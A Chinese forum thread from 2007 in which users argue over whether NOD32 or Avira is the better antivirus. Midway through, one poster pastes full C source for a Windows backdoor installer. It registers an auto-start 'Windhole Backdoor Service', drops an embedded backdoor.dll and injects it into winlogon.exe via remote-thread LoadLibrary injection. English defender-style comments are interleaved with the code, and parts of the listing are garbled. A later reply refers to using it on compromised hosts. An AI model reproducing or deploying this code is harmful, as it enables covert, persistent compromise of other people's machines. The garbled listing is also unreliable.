楼主: 伯夷叔齐

[砖头] NOD32和小红伞版区气氛的区别

伯夷叔齐
 楼主| 发表于 2007-5-23 11:49:13 | 显示全部楼层
原帖由 easy002008 于 2007-5-23 11:36 发表



既然红伞这么强,别的杀软那么弱,为什么这个“强者”总是与“弱者”比来比去呢,太奇怪的心理

反正我上学时,只跟成绩好的学生比成绩,而且我也很少遇到成绩好的学生会与成绩差的学生比 ...

其实,红伞用户并不屑于和NOD32比高低,因为高低已经很明了,为什么有那么多比较帖呢,因为NOD32太吹了,这个我不说你都知道,看看官方论坛,还有各个论坛的NOD区,吹得那个劲,而且居然对于表现优异的红伞进行诋毁,所以,红伞用户对于你们的作为肯定要回击了,也让更多杀软用户明白NOD的真正实力,对大家挑选杀软有好处嘛...

第二个问题就是你说的样本区的质疑,我告诉你,这些病毒木马不是专门为哪个软件做的,也不是专门为哪个软件优化了的,而是广大用户找到这些毒,并上传来考验杀软的能力,也方便大家对自己支持的软件上报...当然了,也肯定有专门针对免杀的病毒和木马,但毕竟是少数,红伞那么出风头,而且不管是什么原因,那么红伞应该是免杀的头号对象吧,至少在卡饭里应该是头号免杀对象吧....但我们并没有见到过很多,为什么,实力的体现,当然了,有些人见到免杀过不了,干脆正常文件加壳改变特征来让红伞误杀,那好呀,正常文件搞些花哨名堂,红伞照杀不误....
easy002008
发表于 2007-5-23 11:50:10 | 显示全部楼层
原帖由 solcroft 于 2007-5-23 11:47 发表
有些人真的很奇怪
人家把这么明显的致命弱点指出来,他们会以为是在夸奖NOD32
真是活在自己的封闭小世界里



是啊,我总是只与成绩好的学生比成绩 ,世界是小了点

哪能像你这位仁兄,成绩永远第一,但永远与那些差生比成绩,向你致敬
mofunzone
发表于 2007-5-23 11:51:52 | 显示全部楼层

回复 #20 solcroft 的帖子

没办法,他们习惯自我满足了,现在我也看开了,在高查杀高误报和低查杀低误报中我宁可选择前者,我宁可把那些不知所以的程序杀掉,或者自己分析后上报排除,也不愿把我自己的数据留给病毒破坏,在我10gb的音乐和2gb的照片面前,我首先选择的是安全,而不是误报
easy002008
发表于 2007-5-23 11:52:29 | 显示全部楼层
原帖由 伯夷叔齐 于 2007-5-23 11:49 发表

其实,红伞用户并不屑于和NOD32比高低,因为高低已经很明了,为什么有那么多比较帖呢,因为NOD32太吹了,这个我不说你都知道,看看官方论坛,还有各个论坛的NOD区,吹得那个劲,而且居然对于表现优异的红伞进行诋毁 ...



有些成绩差的人就爱吹牛,你们成绩好的学生就给人家点面子嘛,何必整天跟差生比成绩呢,你搞好自己的学习就行了嘛,何必为差生吹牛那么难过呢
solcroft
发表于 2007-5-23 11:53:05 | 显示全部楼层
原帖由 easy002008 于 2007-5-23 13:20 发表
是啊,我总是只与成绩好的学生比成绩 ,世界是小了点

哪能像你这位仁兄,成绩永远第一,但永远与那些差生比成绩,向你致敬

最可悲的是成绩差的同学自己都还不知情,别人指点它它还洋洋得意,满面春风,十足的阿Q精神
easy002008
发表于 2007-5-23 11:53:59 | 显示全部楼层
原帖由 mofunzone 于 2007-5-23 11:51 发表
没办法,他们习惯自我满足了,现在我也看开了,在高查杀高误报和低查杀低误报中我宁可选择前者,我宁可把那些不知所以的程序杀掉,或者自己分析后上报排除,也不愿把我自己的数据留给病毒破坏,在我10gb的音乐和 ...


这就对了
每个人都有自己的爱好和选择,别把自己的爱好强加给别人

用自己喜欢的就行了,别比来比去,何必呢
easy002008
发表于 2007-5-23 11:55:33 | 显示全部楼层
原帖由 solcroft 于 2007-5-23 11:53 发表

最可悲的是成绩差的同学自己都还不知情,别人指点它它还洋洋得意,满面春风,十足的阿Q精神



因为这个差生,从来就没遇到过优等生会与他比成绩,所以他会这样想:要么这个所谓的优等生其实也是个差生,要么自己其实也是个优等生
solcroft
发表于 2007-5-23 11:56:47 | 显示全部楼层
原帖由 easy002008 于 2007-5-23 13:25 发表



因为这个差生,从来就没遇到过优等生会与他比成绩,所以他会这样想:要么这个所谓的优等生其实也是个差生,要么自己其实也是个优等生

明白了,原来有些人见识过别人的实力后,就是这种自欺欺人的心态

[ 本帖最后由 solcroft 于 2007-5-23 13:28 编辑 ]
david_sg
发表于 2007-5-23 11:57:53 | 显示全部楼层

回复 #23 mofunzone 的帖子

你是不是闲得很无聊?

如果是的话就看看这个吧,别扯皮了。

很经典的DLL注入代码

//Header
#include "bkdlldata.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#include <winsvc.h>
//---------------------------------------------------------------------
//Global constant
// Analyst notes (review): these five strings are the on-disk and SCM
// indicators this sample leaves behind -- a service registered as SERVICENAME
// and listed under DISPLAYNAME, a copy of the executable as SRVFILENAME and a
// dropped DLL as BDRFILENAME (both placed in the system directory by the code
// below), and DESTPROC, the process the dropped DLL is loaded into.
// SERVICENAME is left non-const, presumably because SERVICE_TABLE_ENTRY takes
// a non-const LPSTR. Arrays larger than their literal are zero-padded.
char SERVICENAME[9] = "windhole";
const char DISPLAYNAME[33] = "Windhole Backdoor Service";
const char SRVFILENAME[13] = "windhole.exe";
const char BDRFILENAME[13] = "backdoor.dll";
const char DESTPROC[19] = "winlogon.exe";
//---------------------------------------------------------------------
//Glabal variable
// Status record handed to the SCM through SetServiceStatus (filled in by
// MyServiceStart and updated by MyServiceCtrlHandler).
SERVICE_STATUS MyServiceStatus;
// Handle returned by RegisterServiceCtrlHandler in MyServiceStart.
SERVICE_STATUS_HANDLE MyServiceStatusHandle;
// Shutdown flag: set to 1 by MyWorkThread on every exit path and by the STOP
// control; polled by MyServiceStart's wait loop. Plain int, written and read
// from different threads with no volatile/atomic qualifier or lock.
int WillStop = 0;
//---------------------------------------------------------------------
//Function declaration
// Enables one named privilege on the current process token; 0 = ok, 1 = failed.
int AddPrivilege(const char *Name);
// ServiceMain: registers the control handler, spawns MyWorkThread, waits on WillStop.
void MyServiceStart (int argc, char *argv[]);
// SCM control callback (pause / continue / stop / interrogate).
void MyServiceCtrlHandler (DWORD opcode);
// NOTE(review): spelled differently from the MyWorkThread defined below, so
// this prototype is never matched by a definition; MyWorkThread is defined
// before its only use, which is why the listing does not depend on it.
DWORD MyWrokThread(void);
// First PID whose main-module base name equals InputProcessName (case-insensitive), else 0.
DWORD ProcessToPID(const char *InputProcessName);
//---------------------------------------------------------------------
//Function definition
// Program entry. Two modes, chosen by argv[1]:
//   "-service": the process was launched by the Service Control Manager --
//               hand MyServiceStart to StartServiceCtrlDispatcher and return
//               when the dispatcher does (1 if it could not be started).
//   otherwise : installer -- copy this executable into the system directory
//               as SRVFILENAME, register it as an auto-start service named
//               SERVICENAME whose command line ends in " -service", and try
//               to start it at once.
// Returns 0 on success and 1 on the first failing Win32 call; failures are
// printed to stdout together with GetLastError().
// Defender view: the installer path leaves a new executable in the system
// directory, a service-installed record (System log event 7045) carrying
// DISPLAYNAME "Windhole Backdoor Service", and an immediate service start.
int main(int argc,char *argv[])
{

// --- service mode -------------------------------------------------------
if ((argc >= 2) && (!lstrcmp(argv[1],"-service")))
{
// Single-service table: SERVICENAME -> MyServiceStart, terminated by a NULL pair.
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart},
{NULL, NULL}
};

// Fails (exit code 1) when the process was not started by the SCM.
if (!StartServiceCtrlDispatcher( DispatchTable))
{
return 1;
}

return 0;
}


// --- installer mode -----------------------------------------------------
char DestName[MAX_PATH + 1];   // <system dir>\SRVFILENAME, later with " -service" appended
char NowName[MAX_PATH + 1];    // path of the currently running executable

ZeroMemory(DestName,MAX_PATH + 1);
ZeroMemory(NowName,MAX_PATH + 1);

if (!GetSystemDirectory(DestName,MAX_PATH))
{
printf("GetSystemDirectory() error = %d\nInstall failure!\n",GetLastError());
return 1;
}

lstrcat(DestName,"\\");
lstrcat(DestName,SRVFILENAME);

// NULL module handle -> full path of this process's own image.
if (!GetModuleFileName(NULL,NowName,MAX_PATH))
{
printf("GetModuleFileName() error = %d\nInstall failure!\n",GetLastError());
return 1;
}


// Third argument 0 (bFailIfExists == FALSE): an existing copy is overwritten.
if (!CopyFile(NowName,DestName,0))
{
printf("CopyFile() error = %d\nInstall failure!\n",GetLastError());
return 1;
}


SC_HANDLE newService, scm;

// SC_MANAGER_CREATE_SERVICE requires an administrative caller.
if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)))
{
printf("OpenSCManager() error = %d\nInstall failure!\n",GetLastError());
return 1;
}

// The binary path becomes "<system dir>\windhole.exe -service", which routes
// the SCM-launched instance into the service-mode branch above.
lstrcat(DestName," -service");

// SERVICE_AUTO_START: started at every boot. The five trailing NULLs leave
// load-order group, tag, dependencies, account and password at their
// defaults; with a NULL account the service runs as LocalSystem.
if (!(newService = CreateService(scm,
SERVICENAME,
DISPLAYNAME,
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_NORMAL,
DestName,
NULL, NULL, NULL, NULL, NULL)))
{
printf("CreateService() error = %d\nInstall failure!\n",GetLastError());
}
else
{
printf("Install success!\n");

// Arguments for MyServiceStart; only the first is passed (count 1 below).
// The second element is a pointer to an empty string, not a NULL terminator.
char *pra[] = {"-service", "\0"};

if (!StartService(newService,1,(const char **)pra))
{
printf("StartService() error = %d\nStart service failure!\n",GetLastError());
}
else
{
printf("Start service Success!\n");
}

}

// Reached with newService == NULL when CreateService failed above.
CloseServiceHandle(newService);
CloseServiceHandle(scm);
return 0;

}
//---------------------------------------------------------------------
// Service work thread, started by MyServiceStart. Sequence as written:
//   1. sleep 4 s;
//   2. write the byte arrays data1..data5 (presumably defined in
//      bkdlldata.h, included at the top) to BDRFILENAME, opened with a
//      *relative* path -- where it lands depends on the service's working
//      directory, which this listing never sets;
//   3. build <system dir>\BDRFILENAME as the path to be loaded, i.e. the code
//      assumes steps 2 and 3 refer to the same file;
//   4. enable SE_DEBUG_NAME on the own token and look up DESTPROC's PID;
//   5. open that process, VirtualAllocEx a buffer, WriteProcessMemory the
//      path into it, resolve LoadLibraryA from this process's kernel32 and
//      CreateRemoteThread on it with the buffer as argument.
// Sets WillStop = 1 on every exit so MyServiceStart's wait loop ends.
// Returns 0 once the remote thread has been requested, 1 on any failure.
// None of the fwrite/fclose/GetSystemDirectory/CreateRemoteThread results
// are checked, and the thread handle CreateRemoteThread returns is dropped.
// Defender view: this is the textbook LoadLibrary remote-thread injection.
// Telemetry that exposes it: a service process enabling SeDebugPrivilege,
// OpenProcess on winlogon.exe requesting VM_WRITE|CREATE_THREAD, a remote
// thread whose start address is kernel32!LoadLibraryA, and a new DLL written
// to the system directory moments before.
DWORD MyWorkThread(void)
{
Sleep(4000);

FILE *fp;

// Relative path: see note 2 above.
if ((fp = fopen(BDRFILENAME,"wb")) == NULL)
{
WillStop = 1;
return 1;
}

// Embedded payload written as five consecutive chunks; return values unchecked.
fwrite(data1,sizeof(data1),1,fp);
fwrite(data2,sizeof(data2),1,fp);
fwrite(data3,sizeof(data3),1,fp);
fwrite(data4,sizeof(data4),1,fp);
fwrite(data5,sizeof(data5),1,fp);
fclose(fp);

char FullName[MAX_PATH + 1];   // absolute path later handed to LoadLibraryA in the target

ZeroMemory(FullName,MAX_PATH + 1);
GetSystemDirectory(FullName,MAX_PATH);
lstrcat(FullName,"\\");
lstrcat(FullName,BDRFILENAME);


// Needed to open a process of another session/account; result ignored.
AddPrivilege(SE_DEBUG_NAME);

HANDLE hRemoteProcess = NULL;
DWORD Pid = ProcessToPID(DESTPROC);   // 0 when not found; OpenProcess then fails below

// Exactly the rights the three remote calls below require.
   if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD |
       PROCESS_VM_OPERATION |
       PROCESS_VM_WRITE |
       PROCESS_VM_READ,
       0,
       Pid)) == NULL)
   {
WillStop = 1;
return 1;
   }


   char *pDllName = NULL;   // address of the path string inside the target process

// Buffer for the path plus terminator; PAGE_READWRITE because it only holds a string.
   if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,
       NULL,
       lstrlen(FullName) + 1,
       MEM_COMMIT,
       PAGE_READWRITE)) == NULL)
   {
CloseHandle(hRemoteProcess);
WillStop = 1;
       return 1;
   }


// Copies lstrlen(FullName) bytes, i.e. the path without its terminator, into
// the region committed one byte larger above.
   if (WriteProcessMemory(hRemoteProcess,
       pDllName,
       FullName,
       lstrlen(FullName),
       NULL) == 0)
   {
VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
CloseHandle(hRemoteProcess);
       WillStop = 1;
return 1;
   }



   PTHREAD_START_ROUTINE pfnStartAddr = NULL;

// LoadLibraryA is resolved in *this* process and the address reused in the
// target; LoadLibraryA's single LPCSTR argument matches the thread-routine
// calling convention, which is what makes the trick work.
   if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(
       GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
   {
VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
CloseHandle(hRemoteProcess);
       WillStop = 1;
return 1;
   }


   DWORD ThreadId = 0;

// Returned thread handle and failure status are both ignored.
CreateRemoteThread(hRemoteProcess,
NULL,
0,
pfnStartAddr,
pDllName,
0,
&ThreadId);

CloseHandle(hRemoteProcess);
   WillStop = 1;
return 0;
}
//---------------------------------------------------------------------
// ServiceMain for SERVICENAME, invoked by the SCM through the dispatch table
// in main. argc/argv are accepted but never read. Flow: register
// MyServiceCtrlHandler, report START_PENDING, spawn MyWorkThread, report
// RUNNING, poll WillStop every 200 ms until the work thread or a STOP control
// sets it, then report STOPPED. Returns early, with no further status update,
// if handler registration or the first SetServiceStatus fails.
// Observations: the CreateThread handle is never closed; WillStop is a plain
// int polled here and written from other threads without synchronisation;
// PAUSE/CONTINUE are advertised although the work thread cannot be paused.
void MyServiceStart (int argc, char *argv[])
{
if (!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler)))
{
return;
}

// Initial status: START_PENDING, accepting STOP and PAUSE/CONTINUE.
MyServiceStatus.dwServiceType = SERVICE_WIN32;
MyServiceStatus.dwCurrentState = SERVICE_START_PENDING;
MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwServiceSpecificExitCode = 0;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}

DWORD Threadid;   // written by CreateThread, otherwise unused


// Initialization code goes here. Handle error condition
// The work thread is the only thing the service does (see MyWorkThread).
if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid))
{
// Thread creation failed: report STOPPED with the Win32 error as exit code.
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
MyServiceStatus.dwWin32ExitCode = GetLastError();
MyServiceStatus.dwServiceSpecificExitCode = GetLastError();

SetServiceStatus(MyServiceStatusHandle, &MyServiceStatus);
return;
}

// Initialization complete - report running status.
MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}

// Busy-wait (200 ms sleeps) until the work thread finishes or STOP arrives.
while(WillStop == 0)
{
Sleep(200);
}

// Final status: STOPPED with a clean exit code.
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
return;
}
//---------------------------------------------------------------------
// SCM control callback registered in MyServiceStart. PAUSE and CONTINUE only
// change the reported state -- the work thread is not affected. STOP reports
// STOPPED, sets WillStop so MyServiceStart's wait loop ends, and returns
// without the common status report at the bottom. INTERROGATE, and any
// opcode not listed (there is no default), falls through to a plain
// SetServiceStatus with the current record.
void MyServiceCtrlHandler (DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_PAUSE:
// Do whatever it takes to pause here.
// (Only the reported state changes; nothing is actually paused.)
MyServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;

case SERVICE_CONTROL_CONTINUE:
// Do whatever it takes to continue here.
MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;

case SERVICE_CONTROL_STOP:
// Do whatever it takes to stop here.
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);

// Releases MyServiceStart's wait loop; early return skips the report below.
WillStop = 1;
return;

case SERVICE_CONTROL_INTERROGATE:
// Fall through to send current status.
break;


}

// Send current status.
if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}

return;
}
//---------------------------------------------------------------------

// Enables the privilege named by Name (here always SE_DEBUG_NAME) on the
// current process's own token. Returns 0 when every call succeeded, 1 on the
// first failure; diagnostics go to stdout, which a service process normally
// has no console for. Observations: hToken is never closed on any path, and
// a non-zero AdjustTokenPrivileges result only says the call was accepted --
// whether the privilege was actually held is reported through GetLastError,
// which this listing does not consult.
// Defender view: a service enabling SeDebugPrivilege on itself immediately
// before opening another process is a high-signal precursor to injection.
int AddPrivilege(const char *Name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID Luid;

// Own token, with enough access to both query and adjust privileges.
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken))
{
printf("OpenProcessToken error.\n");
return 1;
}

// Name -> LUID on the local system (NULL system name).
if (!LookupPrivilegeValue(NULL,Name,&Luid))
{
printf("LookupPrivilegeValue error.\n");
return 1;
}

// Single-entry privilege set, requesting the enabled state.
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = Luid;

// DisableAllPrivileges == 0; previous state is not requested (NULL, NULL).
if (!AdjustTokenPrivileges(hToken,
0,
&tp,
sizeof(TOKEN_PRIVILEGES),
NULL,
NULL))
{
printf("AdjustTokenPrivileges error.\n");
return 1;
}

return 0;
}
//---------------------------------------------------------------------

// Looks up the PID of the first process whose main-module base name equals
// InputProcessName, case-insensitively. Enumerates at most 1024 PIDs via
// EnumProcesses, opens each with query + VM-read rights, reads the base name
// of its first module and compares with stricmp. Returns the matching PID,
// or 0 when enumeration fails or nothing matches.
// Observations: AddPrivilege(SE_DEBUG_NAME) is called again here although the
// caller already did so; handles of non-matching processes are not closed
// inside the loop (only the last one, after it); GetModuleBaseName's result
// is unchecked, so a failed read compares the initial "UnknownProcess". This
// function as posted also carries transcription damage and does not compile
// unchanged.
DWORD ProcessToPID(const char *InputProcessName)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;   // fixed 1024-PID ceiling
unsigned int i;
HANDLE hProcess = NULL;
HMODULE hMod = NULL;
char szProcessName[MAX_PATH] = "UnknownProcess";

AddPrivilege(SE_DEBUG_NAME);

// NOTE(review): the next line is a stray token, apparently a forum-paste artefact.
PIDs
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
{
return 0;
}

// cbNeeded is in bytes; convert to a PID count.
cProcesses = cbNeeded / sizeof(DWORD);

for ( i = 0; i < cProcesses; i++ )
{

hProcess = OpenProcess( PROCESS_QUERY_INformATION |
PROCESS_VM_READ,
FALSE, aProcesses);

if ( hProcess )
{
// First module of the process is its main executable image.
if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
GetModuleBaseName( hProcess, hMod,
szProcessName, sizeof(szProcessName) );

if(!stricmp(szProcessName, InputProcessName))
{
CloseHandle( hProcess );
return aProcesses;
}
}
}//end of if ( hProcess )
}//end of for

// Only the handle from the final iteration is released here.
CloseHandle( hProcess );
return 0;
}
//---------------------------------------------------------------------
mofunzone
发表于 2007-5-23 12:02:44 | 显示全部楼层

回复 #29 david_sg 的帖子

哎呀,写英文作业去了,macbeth的问题很烦人
p.s 注入没前途了,防火墙都有提示。。
祈祷肉鸡没防火墙吧。。